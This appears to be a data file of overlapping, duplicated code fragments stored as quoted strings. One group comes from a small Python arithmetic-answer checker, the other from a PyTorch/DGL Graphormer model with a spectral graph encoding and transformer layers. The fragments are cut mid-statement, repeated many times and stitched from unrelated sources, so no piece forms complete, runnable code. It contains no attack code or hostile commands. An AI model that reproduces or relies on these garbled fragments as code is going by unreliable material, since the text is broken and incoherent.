"sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans",
"int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans =",
"= 0 if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1",
"correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans - int(ans)) print(f\"E{answer}ou!\")",
"0 if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1 ==",
"\"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1)",
"correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer =",
"= int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r'",
"1 num1, sign1, num2, sign2, ans = input().split() correct_ans = 0 if sign1",
"+ int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans",
"num1, sign1, num2, sign2, ans = input().split() correct_ans = 0 if sign1 ==",
"int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r' *",
"0: c -= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans =",
"if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\":",
"correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1) + int(num2) elif",
"elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1)",
"int(input()) while c != 0: c -= 1 num1, sign1, num2, sign2, ans",
"\"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) * int(num2) answer",
"c -= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans = 0",
"= int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2)",
"-= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans = 0 if",
"- int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans",
"correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1) -",
"input().split() correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1) + int(num2)",
"== \"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) * int(num2)",
"ans = input().split() correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1)",
"else: correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans - int(ans))",
"sign2, ans = input().split() correct_ans = 0 if sign1 == \"+\": correct_ans =",
"num2, sign2, ans = input().split() correct_ans = 0 if sign1 == \"+\": correct_ans",
"= int(input()) while c != 0: c -= 1 num1, sign1, num2, sign2,",
"sign1, num2, sign2, ans = input().split() correct_ans = 0 if sign1 == \"+\":",
"sign1 == \"-\": correct_ans = int(num1) - int(num2) else: correct_ans = int(num1) *",
"c != 0: c -= 1 num1, sign1, num2, sign2, ans = input().split()",
"int(num1) + int(num2) elif sign1 == \"-\": correct_ans = int(num1) - int(num2) else:",
"int(num2) else: correct_ans = int(num1) * int(num2) answer = 'r' * abs(correct_ans -",
"== \"+\": correct_ans = int(num1) + int(num2) elif sign1 == \"-\": correct_ans =",
"c = int(input()) while c != 0: c -= 1 num1, sign1, num2,",
"= input().split() correct_ans = 0 if sign1 == \"+\": correct_ans = int(num1) +",
"!= 0: c -= 1 num1, sign1, num2, sign2, ans = input().split() correct_ans"
] |
[
"import torch.nn as nn import torch.nn.functional as F import numpy as np from",
"= self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src)",
"device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward",
"encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy()",
"< 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model,",
"def __setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state)",
"nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph)",
"alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead =",
"graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h'])",
"import torch.nn.functional as F import numpy as np from scipy.linalg import eig class",
"def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D",
"def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead,",
"src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2 =",
"self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch",
"momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0:",
"self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src, scores class",
"graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()),",
"def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D -",
"dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 =",
"= nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not in state:",
"state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self,",
"batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_",
"h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for",
"= self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src, scores",
"expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead",
"F import numpy as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self,",
"h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_ =",
"d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks =",
"embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for g",
"self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100,",
"dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h,",
"nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu",
"self.depth = depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding =",
"self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2",
"class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A =",
"F.relu def __setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer,",
"= (D - A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping",
"= src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src",
"encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h =",
"TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense()",
"range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0)",
"torch.nn as nn import torch.nn.functional as F import numpy as np from scipy.linalg",
"= np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_",
"self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model)",
"momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:,",
"src = src + self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module):",
"self.activation = F.relu def __setstate__(self, state): if 'activation' not in state: state['activation'] =",
"Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model",
"nn import torch.nn.functional as F import numpy as np from scipy.linalg import eig",
"encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding:",
"attentions_ = [] for block in self.blocks: h, att_ = block(h) if need_weights:",
"d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding",
"= depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding",
"= encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L =",
"need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if",
"src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src",
"L = (D - A).numpy() w, V = eig(L) momenta = np.dot(L, V)",
"self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L",
"eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping >",
"self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder =",
"self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if",
"momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0:",
"i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h, attentions_",
"attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))",
"encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees())",
"dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward)",
"src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2)",
"key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src",
"* expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size,",
"clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self,",
"src + self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self,",
"import dgl import torch import torch.nn as nn import torch.nn.functional as F import",
"= nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation =",
"clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return",
"= nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding",
"src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src +",
"self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding:",
"self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src)",
"dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else:",
"block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes,",
"= TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self,",
"import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph):",
"numpy as np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size",
"concatenate_encoding if concatenate_encoding: self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else:",
"in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i,",
"self.encoder = TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size,",
"A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V",
"nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not in state: state['activation']",
"self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout)",
"'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None,",
"activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout",
"not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None):",
"depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if",
"nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks",
"forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src",
"= self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = [] for momentum",
"momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048,",
"momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):",
"= nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1",
"nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth",
"self.d_model = d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model *",
"V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = []",
"nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward,",
"in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2,",
"class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__()",
"encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth = depth self.nhead = nhead",
"torch import torch.nn as nn import torch.nn.functional as F import numpy as np",
"np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module):",
"= nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder",
"encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead,",
"def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding",
"= [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif",
"dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h']",
"self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation' not in",
"= torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in self.blocks: h, att_ = block(h)",
"super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout =",
"def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model =",
"i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights:",
"attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h =",
"scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self,",
"V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if",
"nhead self.dim_feedforward = d_model * expansion_factor self.concatenate_encoding = concatenate_encoding if concatenate_encoding: self.encoder =",
"TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs,",
"if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())]",
"- A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size",
"self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding +",
"[] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for",
"encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D",
"= np.array(momenta_) elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class",
"0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead,",
"= nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self, state): if 'activation'",
"src = src + self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src =",
"__init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model",
"= [] for block in self.blocks: h, att_ = block(h) if need_weights: attentions_.append(att_)",
"torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch = [] for",
"truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated,",
"nhead, dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model)",
"g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block in",
"forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding =",
"self.dropout1(src2) src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src",
"class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn =",
"nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1 =",
"dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout = nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1",
"nn.Dropout(dropout) self.linear2 = nn.Linear(dim_feedforward, d_model) self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 =",
"TopologicalEncoding(encoding_size) self.node_embedder = nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder",
"dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for",
"self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for",
"def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)",
"for _ in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph",
"src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src +",
"graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long))",
"need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h",
"<reponame>rdangovs/6883-project import dgl import torch import torch.nn as nn import torch.nn.functional as F",
"D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L) momenta",
"= momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,",
"= src + self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def",
"self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in range(depth)]) def",
"scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src",
"as nn import torch.nn.functional as F import numpy as np from scipy.linalg import",
"__setstate__(self, state): if 'activation' not in state: state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def",
"self.dropout2(src2) src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5,",
"nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _ in",
"d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout) self.linear1",
"__init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"): super(TransformerEncoderLayer, self).__init__() self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)",
"torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] =",
"= torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L) momenta =",
"in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping < 0: momenta",
"state['activation'] = F.relu super(TransformerEncoderLayer, self).__setstate__(state) def forward(self, src, src_mask=None, src_key_padding_mask=None): src2, scores =",
"np.dot(L, V) clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ =",
"= d_model self.depth = depth self.nhead = nhead self.dim_feedforward = d_model * expansion_factor",
"= nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model) self.blocks = nn.ModuleList([TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=self.dim_feedforward) for _",
"src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src = src + self.dropout1(src2) src = self.norm1(src) src2",
"in range(depth)]) def forward(self, graphs, need_weights=False): encoding = torch.cat([self.encoder.encode(graph) for graph in dgl.unbatch(graphs)],",
"depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True): super().__init__() self.d_model = d_model self.depth =",
"elif clipping < 0: momenta = momenta[:, :self.encoding_size] return torch.FloatTensor(np.real(momenta)) class TransformerEncoderLayer(nn.Module): def",
"graphs.ndata['h'] = torch.cat((encoding, embedding.squeeze()), dim=-1) else: graphs.ndata['h'] = encoding + embedding.squeeze() batch =",
"= nn.Embedding(alphabet_size, d_model - encoding_size) else: self.node_embedder = nn.Embedding(alphabet_size, d_model) self.encoder = TopologicalEncoding(d_model)",
"A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping = self.encoding_size -",
"src = self.norm1(src) src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) src = src + self.dropout2(src2) src =",
"for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta = np.array(momenta_) elif clipping <",
"clipping = self.encoding_size - graph.num_nodes() if clipping > 0: momenta_ = [] for",
"self.norm1 = nn.LayerNorm(d_model) self.norm2 = nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation",
"= nn.LayerNorm(d_model) self.dropout1 = nn.Dropout(dropout) self.dropout2 = nn.Dropout(dropout) self.activation = F.relu def __setstate__(self,",
"scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8, expansion_factor=2, alphabet_size=100, encoding_size=32, device='cpu', concatenate_encoding=True):",
"= encoding + embedding.squeeze() batch = [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h",
"graph): A = graph.adjacency_matrix().to_dense() D = torch.diag(graph.in_degrees()) L = (D - A).numpy() w,",
"= [] for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = []",
"- graph.num_nodes() if clipping > 0: momenta_ = [] for momentum in momenta:",
"for graph in dgl.unbatch(graphs)], dim=0) embedding = self.node_embedder(graphs.ndata['atomic'].type(torch.long)) if self.concatenate_encoding: graphs.ndata['h'] = torch.cat((encoding,",
"0: momenta_ = [] for momentum in momenta: momenta_.append(np.pad(momentum, (0, clipping))) momenta =",
"for g in dgl.unbatch(graphs): batch.append(g.ndata['h']) h = torch.nn.utils.rnn.pad_sequence(batch) attentions_ = [] for block",
"in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return h, attentions_ return h",
"(D - A).numpy() w, V = eig(L) momenta = np.dot(L, V) clipping =",
"src, src_mask=None, src_key_padding_mask=None): src2, scores = self.self_attn(src, src, src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask) src =",
"np from scipy.linalg import eig class TopologicalEncoding(): def __init__(self, encoding_size=50): self.encoding_size = encoding_size",
":] for i, num_nodes in enumerate(graphs.batch_num_nodes())] h = torch.cat(truncated, dim=0) if need_weights: return",
"att_ = block(h) if need_weights: attentions_.append(att_) truncated = [h[:num_nodes, i, :] for i,",
"src = self.norm2(src) return src, scores class Graphormer(nn.Module): def __init__(self, d_model=128, depth=5, nhead=8,",
"torch.diag(graph.in_degrees()) L = (D - A).numpy() w, V = eig(L) momenta = np.dot(L,",
"__init__(self, encoding_size=50): self.encoding_size = encoding_size def encode(self, graph): A = graph.adjacency_matrix().to_dense() D =",
